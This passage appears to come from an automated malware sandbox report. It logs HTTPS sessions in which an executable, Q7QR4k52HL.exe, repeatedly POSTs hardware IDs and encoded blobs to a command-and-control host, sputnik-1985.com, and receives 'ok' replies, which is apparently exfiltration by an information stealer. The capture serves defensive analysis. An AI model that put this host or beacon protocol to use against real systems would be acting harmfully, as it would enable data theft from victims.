{"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 90030fa7ba878c15-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1771&min_rtt=1768&rtt_var=670&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2840&recv_bytes=974&delivery_rate=1625835&cwnd=238&unsent_bytes=0&cid=be0d44ad6dbe5bc8&ts=634&x=0"
2025-01-11 07:05:55 UTC	246	IN	Data Raw: 34 63 39 30 0d 0a 66 35 42 4c 61 6b 4e 68 63 56 2f 61 48 4a 72 63 55 76 31 75 31 38 4d 5a 2b 73 53 72 37 36 6e 76 31 43 52 75 41 31 33 36 30 47 6f 45 73 6a 31 49 65 56 56 64 66 61 6c 35 75 4f 59 6d 6a 78 75 79 37 7a 75 62 6f 49 6e 56 7a 34 36 34 56 77 73 76 66 34 79 39 53 45 58 32 4b 67 59 77 42 46 31 39 76 32 53 34 35 67 6d 47 54 4c 4b 74 4f 38 44 6d 7a 6f 58 4c 6a 72 68 47 44 32 67 79 69 72 77 4a 46 2f 77 73 41 69 59 43 46 54 36 32 63 66 2b 35 4e 35 77 45 75 61 70 30 6b 71 6d 4a 77 34 75 4b 72 67 5a 55 49 52 43 66 70 41 73 79 38 54 67 42 59 52 78 64 4a 50 68 35 39 50 35 6f 33 77 2b 79 6f 58 57 63 6f 4d 43 48 77 59 65 77 52 77 70 70 4c 5a 4f 32 41 68 66 79 4c 77 4d 73 43 77 45 7a 76 48 62 30 76 7a 32 63 54 50 76 68 66 49 44 6d Data Ascii: 4c90f5BLakNhcV/aHJrcUv1u18MZ+sSr76nv1CRuA1360GoEsj1IeVVdfal5uOYmjxuy7zuboInVz464Vwsvf4y9SEX2KgYwBF19v2S45gmGTLKtO8DmzoXLjrhGD2gyirwJF/wsAiYCFT62cf+5N5wEuap0kqmJw4uKrgZUIRCfpAsy8TgBYRxdJPh59P5o3w+yoXWcoMCHwYewRwppLZO2AhfyLwMsCwEzvHb0vz2cTPvhfIDm
2025-01-11 07:05:55 UTC	1369	IN	Data Raw: 6b 63 32 59 76 37 56 58 48 58 51 79 69 4c 52 49 41 72 77 77 53 43 59 50 55 32 58 34 64 76 53 77 4e 5a 77 44 73 71 42 37 69 71 6e 4a 6a 73 4f 46 73 6b 77 44 62 6a 43 57 75 41 38 56 2b 79 34 48 4a 67 73 56 4d 72 73 2b 74 76 34 33 68 30 7a 74 34 56 75 49 70 63 71 5a 78 70 7a 32 57 55 4a 34 66 35 2b 2b 53 45 57 79 4c 77 59 67 44 68 4d 76 73 48 58 7a 75 79 4b 55 42 62 69 73 65 35 57 73 78 6f 37 4c 69 72 78 4d 41 32 73 37 6c 62 38 4f 48 66 4a 70 52 6d 45 45 43 33 33 67 50 74 75 37 49 4a 67 41 6f 2b 4e 42 32 4c 6d 48 6c 49 75 4b 75 67 5a 55 49 54 65 64 73 51 73 57 2f 53 6f 41 4b 68 45 54 4c 37 35 7a 2f 61 77 32 6d 67 4b 2f 6f 6d 6d 53 71 4d 2b 4f 77 6f 61 2f 51 77 74 6c 66 39 62 79 44 77 57 79 63 55 67 41 44 68 67 78 73 6d 6e 34 2f 69 2f 52 46 66 57 6d 64 39 6a Data Ascii: kc2Yv7VXHXQyiLRIArwwSCYPU2X4dvSwNZwDsqB7iqnJjsOFskwDbjCWuA8V+y4HJgsVMrs+tv43h0zt4VuIpcqZxpz2WUJ4f5++SEWyLwYgDhMvsHXzuyKUBbise5Wsxo7LirxMA2s7lb8OHfJpRmEEC33gPtu7IJgAo+NB2LmHlIuKugZUITedsQsW/SoAKhETL75z/aw2mgK/ommSqM+Owoa/Qwtlf9byDwWycUgADhgxsmn4/i/RFfWmd9j
2025-01-11 07:05:55 UTC	1369	IN	Data Raw: 6f 48 32 43 45 78 6d 4a 39 6a 71 53 44 66 78 50 51 73 72 51 53 59 2b 74 6e 44 2f 71 48 43 41 51 71 7a 68 66 4a 54 6d 6b 63 33 47 6a 4c 35 41 48 6d 34 79 6d 37 77 47 45 76 63 6d 41 43 45 44 48 6a 69 38 64 66 4f 39 50 5a 73 65 76 36 46 7a 6e 61 66 44 68 34 76 44 39 6b 45 55 49 57 66 59 67 78 38 57 73 42 77 4c 4c 77 30 55 4b 2f 68 68 74 71 64 77 6d 41 44 31 2b 54 75 56 72 73 79 49 78 49 79 38 53 41 6c 72 4d 35 43 38 43 77 2f 39 4c 51 67 74 43 78 6b 77 74 6e 72 77 74 7a 75 55 43 72 57 67 63 64 6a 6f 69 59 72 54 7a 65 34 47 4f 47 59 7a 6c 62 31 4b 4b 50 45 6e 42 69 59 56 55 79 4c 32 5a 37 69 35 50 4e 39 55 39 61 31 79 6d 4b 33 44 69 63 75 4b 75 30 4d 50 5a 6a 79 56 74 51 49 54 39 53 30 45 4b 41 34 56 50 62 39 36 2f 61 77 31 6c 67 43 35 34 54 58 59 6f 64 48 4e Data Ascii: oH2CExmJ9jqSDfxPQsrQSY+tnD/qHCAQqzhfJTmkc3GjL5AHm4ym7wGEvcmACEDHji8dfO9PZsev6FznafDh4vD9kEUIWfYgx8WsBwLLw0UK/hhtqdwmAD1+TuVrsyIxIy8SAlrM5C8Cw/9LQgtCxkwtnrwtzuUCrWgcdjoiYrTze4GOGYzlb1KKPEnBiYVUyL2Z7i5PN9U9a1ymK3DicuKu0MPZjyVtQIT9S0EKA4VPb96/aw1lgC54TXYodHN
2025-01-11 07:05:55 UTC	1369	IN	Data Raw: 45 41 49 57 66 59 75 77 45 50 2f 43 63 42 4c 41 55 62 4f 72 5a 7a 38 37 67 37 6d 41 75 7a 72 48 4f 56 6f 38 71 4d 7a 34 65 6b 52 51 64 72 4d 70 4c 79 52 6c 33 31 4d 55 68 35 51 7a 51 78 6b 57 37 6a 72 43 62 66 45 2f 75 34 4f 35 2b 71 69 64 57 4c 6a 72 6c 50 41 32 6b 33 6c 37 30 4d 45 2f 51 76 42 53 51 4d 47 53 2b 77 63 50 57 31 50 35 51 65 74 61 78 2f 6c 4b 4c 42 68 73 48 4e 2b 41 59 4c 65 58 2f 41 38 6a 30 51 2f 53 6b 4c 4e 30 4d 4d 63 36 45 2b 2f 37 4a 77 78 30 79 35 72 33 75 58 71 73 57 47 77 34 79 36 53 41 74 6b 4e 70 43 36 47 68 7a 32 49 51 6b 76 44 42 49 35 76 58 76 38 75 54 53 5a 41 2f 58 76 4f 35 2b 2b 69 64 57 4c 6f 70 46 7a 54 6b 41 46 32 4b 31 47 42 4c 49 75 42 47 46 62 55 7a 47 37 63 76 43 78 4e 70 59 41 76 36 68 77 6c 4b 33 4e 67 63 4b 49 73 Data Ascii: EAIWfYuwEP/CcBLAUbOrZz87g7mAuzrHOVo8qMz4ekRQdrMpLyRl31MUh5QzQxkW7jrCbfE/u4O5+qidWLjrlPA2k3l70ME/QvBSQMGS+wcPW1P5Qetax/lKLBhsHN+AYLeX/A8j0Q/SkLN0MMc6E+/7Jwx0y5r3uXqsWGw4y6SAtkNpC6Ghz2IQkvDBI5vXv8uTSZA/XvO5++idWLopFzTkAF2K1GBLIuBGFbUzG7cvCxNpYAv6hwlK3NgcKIs
2025-01-11 07:05:55 UTC	1369	IN	Data Raw: 35 69 72 55 42 44 2f 77 6b 42 79 6b 4c 47 6a 79 38 65 2f 57 34 50 4a 55 4e 73 71 39 31 6b 4f 61 48 7a 63 79 56 39 68 35 4d 51 43 2b 44 6f 42 34 51 30 79 51 48 59 52 78 64 4a 50 68 35 39 50 35 6f 33 77 57 6e 70 58 61 4b 72 38 36 44 78 49 36 6b 52 77 46 71 4c 5a 2b 39 44 42 72 2b 4c 77 63 6e 41 68 59 33 74 48 6e 39 74 54 2b 54 54 50 76 68 66 49 44 6d 6b 63 33 6c 68 71 56 52 44 32 38 30 6a 71 6c 49 41 72 77 77 53 43 59 50 55 32 58 34 66 66 4f 31 4e 4a 38 41 74 61 56 32 6d 4c 54 47 69 73 79 45 76 56 51 47 5a 6a 69 54 75 67 4d 53 39 44 73 45 4c 78 45 57 4c 36 6f 2b 74 76 34 33 68 30 7a 74 34 55 32 66 74 74 6d 4f 69 62 79 67 52 52 70 71 4d 70 54 79 46 31 50 72 61 51 38 74 51 30 74 39 76 6e 48 78 76 54 2b 65 42 62 6d 73 66 70 47 6a 79 49 76 50 68 37 78 47 43 6d Data Ascii: 5irUBD/wkBykLGjy8e/W4PJUNsq91kOaHzcyV9h5MQC+DoB4Q0yQHYRxdJPh59P5o3wWnpXaKr86DxI6kRwFqLZ+9DBr+LwcnAhY3tHn9tT+TTPvhfIDmkc3lhqVRD280jqlIArwwSCYPU2X4ffO1NJ8AtaV2mLTGisyEvVQGZjiTugMS9DsELxEWL6o+tv43h0zt4U2fttmOibygRRpqMpTyF1PraQ8tQ0t9vnHxvT+eBbmsfpGjyIvPh7xGCm
2025-01-11 07:05:55 UTC	1369	IN	Data Raw: 45 56 33 31 4a 55 68 35 51 78 41 36 75 33 2f 79 74 7a 79 51 43 37 47 7a 63 5a 2b 30 79 49 7a 41 67 4c 70 47 41 57 77 31 6d 62 73 46 45 66 38 75 44 79 34 47 55 33 50 34 65 65 44 2b 61 4e 38 74 75 4b 70 33 77 2f 79 4a 6b 6f 57 55 39 6b 45 41 49 57 66 59 73 67 49 59 2b 43 51 4c 4c 67 41 42 50 4c 35 73 2b 4c 4d 36 6a 51 61 2b 70 48 61 56 71 38 71 4c 7a 59 61 36 56 41 56 68 50 4a 50 79 52 6c 33 31 4d 55 68 35 51 7a 41 71 72 6e 54 2f 73 69 61 55 44 62 61 33 64 6f 6a 6d 68 38 33 61 69 71 63 47 56 48 63 76 6a 37 55 58 55 2b 74 70 44 79 31 44 53 33 32 2b 64 2f 36 35 4e 70 45 65 73 4b 64 30 6c 36 2f 41 69 63 4f 4f 74 6b 49 49 5a 6a 71 62 76 67 4d 61 38 53 59 4d 4b 41 30 61 4d 76 67 77 75 4c 6b 6f 33 31 54 31 67 47 43 62 71 73 54 4e 31 4d 4f 76 42 67 74 74 66 38 44 Data Ascii: EV31JUh5QxA6u3/ytzyQC7GzcZ+0yIzAgLpGAWw1mbsFEf8uDy4GU3P4eeD+aN8tuKp3w/yJkoWU9kEAIWfYsgIY+CQLLgABPL5s+LM6jQa+pHaVq8qLzYa6VAVhPJPyRl31MUh5QzAqrnT/siaUDba3dojmh83aiqcGVHcvj7UXU+tpDy1DS32+d/65NpEesKd0l6/AicOOtkIIZjqbvgMa8SYMKA0aMvgwuLko31T1gGCbqsTN1MOvBgttf8D
2025-01-11 07:05:55 UTC	1369	IN	Data Raw: 67 6b 44 4e 77 59 55 4b 2f 70 4c 2b 37 41 2b 6d 42 72 31 76 6b 54 57 35 73 6a 4e 6b 37 53 76 42 68 6f 68 5a 38 72 38 53 41 2b 79 63 55 68 6d 41 41 45 76 76 6e 33 75 76 58 65 68 4d 70 4b 33 63 5a 2b 32 7a 70 72 45 7a 66 67 47 41 79 46 6e 6f 66 49 42 47 75 6b 34 48 69 77 54 46 48 32 48 4d 4c 69 6d 63 4d 64 4d 67 4b 4a 31 6c 71 48 66 6e 49 61 71 6f 45 77 4c 63 54 69 50 76 55 68 54 73 69 39 49 65 56 42 64 66 62 78 76 75 4f 5a 67 7a 56 66 67 38 69 7a 49 39 4e 62 44 30 73 32 67 42 6c 51 7a 63 64 69 67 53 45 57 79 62 67 73 7a 45 52 55 2b 72 6e 32 2f 67 41 36 34 46 72 69 6e 62 49 6d 59 39 34 72 52 67 4c 42 52 48 53 30 71 6d 37 77 47 47 75 52 70 52 6d 45 4d 55 32 57 42 50 72 44 2b 44 39 46 4d 72 65 45 6a 32 4a 50 4b 67 38 57 4b 6f 46 64 42 52 69 57 56 74 42 38 4d Data Ascii: gkDNwYUK/pL+7A+mBr1vkTW5sjNk7SvBhohZ8r8SA+ycUhmAAEvvn3uvXehMpK3cZ+2zprEzfgGAyFnofIBGuk4HiwTFH2HMLimcMdMgKJ1lqHfnIaqoEwLcTiPvUhTsi9IeVBdfbxvuOZgzVfg8izI9NbD0s2gBlQzcdigSEWybgszERU+rn2/gA64FrinbImY94rRgLBRHS0qm7wGGuRpRmEMU2WBPrD+D9FMreEj2JPKg8WKoFdBRiWVtB8M
2025-01-11 07:05:55 UTC	1369	IN	Data Raw: 46 45 45 43 2b 71 65 50 75 6f 4d 39 67 79 69 34 5a 31 6e 36 66 66 6e 64 79 43 69 48 67 5a 59 6a 47 57 74 52 34 4d 73 6d 64 49 4c 6b 4e 4c 42 50 67 32 75 49 46 2b 33 78 54 31 2b 54 75 74 70 63 65 44 7a 4a 75 6e 43 79 74 76 4f 4a 6d 6b 47 41 72 39 61 55 5a 68 42 56 4e 6c 36 6a 43 34 75 69 48 66 56 4f 58 7a 49 4d 33 31 6e 74 32 5a 6b 76 68 66 54 48 64 2f 77 4f 42 47 58 65 42 70 55 47 46 45 45 43 2b 71 65 50 75 6f 4d 39 67 79 69 34 5a 31 6e 36 66 66 6e 64 79 43 2b 57 67 36 51 41 47 6d 70 77 73 54 2f 43 34 65 4d 45 4e 64 66 62 63 2b 6f 49 64 77 31 30 79 4b 37 7a 75 41 35 70 48 4e 2f 6f 36 34 53 41 74 33 4c 74 57 56 42 68 72 7a 50 78 67 32 44 46 77 54 6a 6c 2b 34 38 48 43 5a 54 4f 33 7a 4e 64 69 69 32 4d 32 54 33 65 51 64 57 54 4a 6f 79 4f 41 58 55 2b 74 70 48 Data Ascii: FEEC+qePuoM9gyi4Z1n6ffndyCiHgZYjGWtR4MsmdILkNLBPg2uIF+3xT1+TutpceDzJunCytvOJmkGAr9aUZhBVNl6jC4uiHfVOXzIM31nt2ZkvhfTHd/wOBGXeBpUGFEEC+qePuoM9gyi4Z1n6ffndyC+Wg6QAGmpwsT/C4eMENdfbc+oIdw10yK7zuA5pHN/o64SAt3LtWVBhrzPxg2DFwTjl+48HCZTO3zNdii2M2T3eQdWTJoyOAXU+tpH
2025-01-11 07:05:55 UTC	1369	IN	Data Raw: 51 71 6e 6e 6f 76 58 44 52 54 4c 6e 68 49 39 69 72 32 34 72 62 6a 76 70 42 46 6d 5a 2f 68 2f 77 52 58 65 52 70 55 48 4a 4e 55 79 2f 34 4a 72 6a 35 50 70 49 4e 74 71 39 34 69 72 54 50 6a 74 32 4f 38 58 67 79 54 43 32 66 6f 67 74 66 77 79 51 4d 4e 78 59 51 4c 62 39 41 78 70 4d 69 6d 42 79 32 34 31 65 66 71 38 57 7a 39 62 71 6e 51 52 77 6a 47 5a 75 6b 43 31 32 38 61 52 42 68 57 31 4d 51 71 6e 6e 6f 76 58 4b 7a 43 37 69 74 4f 34 66 6f 30 4d 33 64 7a 65 34 56 51 69 45 74 32 4f 70 49 57 76 45 37 47 69 63 41 42 54 37 2f 51 4d 61 54 49 70 67 63 74 75 4e 4b 6c 61 4c 66 6d 4d 69 64 73 58 67 79 54 43 32 66 6f 67 74 66 31 78 4e 4b 45 42 55 51 50 62 5a 35 75 50 42 77 68 30 7a 74 34 56 61 4b 6f 64 6d 4f 69 61 69 4d 42 44 31 33 50 4a 69 38 44 31 32 38 61 51 52 68 57 31 Data Ascii: QqnnovXDRTLnhI9ir24rbjvpBFmZ/h/wRXeRpUHJNUy/4Jrj5PpINtq94irTPjt2O8XgyTC2fogtfwyQMNxYQLb9AxpMimBy241efq8Wz9bqnQRwjGZukC128aRBhW1MQqnnovXKzC7itO4fo0M3dze4VQiEt2OpIWvE7GicABT7/QMaTIpgctuNKlaLfmMidsXgyTC2fogtf1xNKEBUQPbZ5uPBwh0zt4VaKodmOiaiMBD13PJi8D128aQRhW1

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49733	104.21.48.1	443	6112	C:\Users\user\Desktop\Q7QR4k52HL.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 07:05:56 UTC	276	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=GKMGCZTT9005 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 18122 Host: sputnik-1985.com
2025-01-11 07:05:56 UTC	15331	OUT	Data Raw: 2d 2d 47 4b 4d 47 43 5a 54 54 39 30 30 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 46 34 36 38 39 32 30 42 46 46 41 31 31 37 32 44 30 36 33 32 44 46 30 45 32 38 44 43 34 31 32 0d 0a 2d 2d 47 4b 4d 47 43 5a 54 54 39 30 30 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 47 4b 4d 47 43 5a 54 54 39 30 30 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 68 35 56 66 48 2d 2d 0d 0a 2d 2d 47 4b 4d 47 43 5a 54 54 39 30 30 35 0d 0a 43 6f 6e 74 65 Data Ascii: --GKMGCZTT9005Content-Disposition: form-data; name="hwid"FF468920BFFA1172D0632DF0E28DC412--GKMGCZTT9005Content-Disposition: form-data; name="pid"2--GKMGCZTT9005Content-Disposition: form-data; name="lid"4h5VfH----GKMGCZTT9005Conte
2025-01-11 07:05:56 UTC	2791	OUT	Data Raw: 0a 66 e1 9f 97 c5 15 2e a7 07 cf 5c b7 ad 66 f0 cc 99 a8 33 f7 13 05 cf ec 85 7a 3b 85 8d 54 32 2f 1f e5 1b c1 33 7b 37 a5 bf 9f 8e 3a f1 6e 9a e0 79 69 60 c1 4c a6 f2 f7 de 4b 1f 36 af 1d f9 d7 e0 58 6d 5b 0b fd 9c 0a b5 9b 60 cc b0 d7 ab 1f 3b d0 52 0a 9f fd 54 22 95 3f 7a 94 ff 75 ab 9f a1 e3 6f 93 83 99 38 43 4e 2f 95 2f 6d 6e ac ae d3 03 1e ad ac 6f 7a a3 8a 81 36 d9 bf 1f 83 71 fd 1a ed c5 4d d3 3e 9b d8 ac 97 0c bd 15 36 2b 97 37 bb ef 2e 57 0f bc 3e 57 2a 0f 97 2f ad 6d 4a a7 02 2f 2b 7f 42 10 78 3e ba 45 a8 b5 6d 75 bf 83 75 53 b3 09 3b 9c 3e 27 56 d3 d4 ab d6 33 5e 4f 4d 1f 4e cd b2 89 b4 bc b1 b1 56 29 af ef 1e fa 70 79 ed 62 65 cf 7b d9 de 73 45 81 36 af a9 da 16 51 bc 21 8f 77 45 11 8f 43 d4 61 11 d5 14 88 8d cc 54 77 94 6d 93 be 93 15 d7 52 Data Ascii: f.\f3z;T2/3{7:nyi`LK6Xm[`;RT"?zuo8CN//mnoz6qM>6+7.W>W*/mJ/+Bx>EmuuS;>'V3^OMNV)pybe{sE6Q!wECaTwmR
2025-01-11 07:05:57 UTC	1125	IN	HTTP/1.1 200 OK Date: Sat, 11 Jan 2025 07:05:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=6piuc0q23g3rrlrs0pvmdvfg7o; expires=Wed, 07 May 2025 00:52:35 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2Bhy7EAbPTJCMPdmMBn1pNMirxcz3gXifSSpE%2FrCqFdoYdcSPR66msUoeSWRLSWYWNUhT1PO8uzccvj61DE7XZp1mv%2BtKJDpL0wxIlALSdY9tFdqEnj280AsJOaTWP6ppNwkl"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 90030fb10d72c461-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1533&min_rtt=1527&rtt_var=585&sent=10&recv=23&lost=0&retrans=0&sent_bytes=2840&recv_bytes=19078&delivery_rate=1850443&cwnd=228&unsent_bytes=0&cid=3423eb1425c22c32&ts=612&x=0"
2025-01-11 07:05:57 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2025-01-11 07:05:57 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49734	104.21.48.1	443	6112	C:\Users\user\Desktop\Q7QR4k52HL.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 07:05:57 UTC	276	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=QQ18IF45HAOU0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8749 Host: sputnik-1985.com
2025-01-11 07:05:57 UTC	8749	OUT	Data Raw: 2d 2d 51 51 31 38 49 46 34 35 48 41 4f 55 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 46 34 36 38 39 32 30 42 46 46 41 31 31 37 32 44 30 36 33 32 44 46 30 45 32 38 44 43 34 31 32 0d 0a 2d 2d 51 51 31 38 49 46 34 35 48 41 4f 55 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 51 51 31 38 49 46 34 35 48 41 4f 55 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 68 35 56 66 48 2d 2d 0d 0a 2d 2d 51 51 31 38 49 46 34 35 48 41 4f 55 30 0d 0a 43 Data Ascii: --QQ18IF45HAOU0Content-Disposition: form-data; name="hwid"FF468920BFFA1172D0632DF0E28DC412--QQ18IF45HAOU0Content-Disposition: form-data; name="pid"2--QQ18IF45HAOU0Content-Disposition: form-data; name="lid"4h5VfH----QQ18IF45HAOU0C
2025-01-11 07:05:58 UTC	1121	IN	HTTP/1.1 200 OK Date: Sat, 11 Jan 2025 07:05:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=jr7sthlmjhr4hil3kh0rj2f1eh; expires=Wed, 07 May 2025 00:52:37 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=p4BUpX0jFBymUw6kn7kCzILKAc42lu4OAFLxKF9l1PYndLA6c9gi1%2BflqDe4vFLA9j5HeqKFDEs3qc8P5f4F%2B144pAnDohzntZmC7NdPdqsToN8V0fRx99LtrphTUMajJ2pr"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 90030fb89e9442e9-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1685&min_rtt=1675&rtt_var=649&sent=7&recv=13&lost=0&retrans=0&sent_bytes=2840&recv_bytes=9683&delivery_rate=1659090&cwnd=240&unsent_bytes=0&cid=5c3802c41db1f1f2&ts=530&x=0"
2025-01-11 07:05:58 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2025-01-11 07:05:58 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49735	104.21.48.1	443	6112	C:\Users\user\Desktop\Q7QR4k52HL.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 07:05:59 UTC	282	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=TXZ6P88ZYK8L5BSO92 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 20432 Host: sputnik-1985.com
2025-01-11 07:05:59 UTC	15331	OUT	Data Raw: 2d 2d 54 58 5a 36 50 38 38 5a 59 4b 38 4c 35 42 53 4f 39 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 46 34 36 38 39 32 30 42 46 46 41 31 31 37 32 44 30 36 33 32 44 46 30 45 32 38 44 43 34 31 32 0d 0a 2d 2d 54 58 5a 36 50 38 38 5a 59 4b 38 4c 35 42 53 4f 39 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 54 58 5a 36 50 38 38 5a 59 4b 38 4c 35 42 53 4f 39 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 68 35 56 66 48 2d 2d 0d 0a 2d 2d 54 Data Ascii: --TXZ6P88ZYK8L5BSO92Content-Disposition: form-data; name="hwid"FF468920BFFA1172D0632DF0E28DC412--TXZ6P88ZYK8L5BSO92Content-Disposition: form-data; name="pid"3--TXZ6P88ZYK8L5BSO92Content-Disposition: form-data; name="lid"4h5VfH----T
2025-01-11 07:05:59 UTC	5101	OUT	Data Raw: 00 00 60 93 1b 88 82 85 4d 3f 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60 61 d3 4f 03 00 00 00 00 00 00 Data Ascii: `M?lrQMn 64F6(X&7~`aO
2025-01-11 07:06:00 UTC	1129	IN	HTTP/1.1 200 OK Date: Sat, 11 Jan 2025 07:05:59 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=sitppuu4bvu1l2k2vhmv1u96on; expires=Wed, 07 May 2025 00:52:38 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=c7mUfzrkQs5rEWr%2F8dPEEIZkiCRhUgMcXnF26IdflnutQTMA3DA%2FOf5vMKuk0B7s7%2BmgledT1zfkz%2B3fgL1QXuWvKwqKTqxOchxmj9DflKQqY8Naor1lug1yuqt%2B9iQKUUJf"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 90030fc27e458c15-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1782&min_rtt=1775&rtt_var=680&sent=11&recv=26&lost=0&retrans=0&sent_bytes=2839&recv_bytes=21394&delivery_rate=1592148&cwnd=238&unsent_bytes=0&cid=7ef943dbf493ed3a&ts=667&x=0"
2025-01-11 07:06:00 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
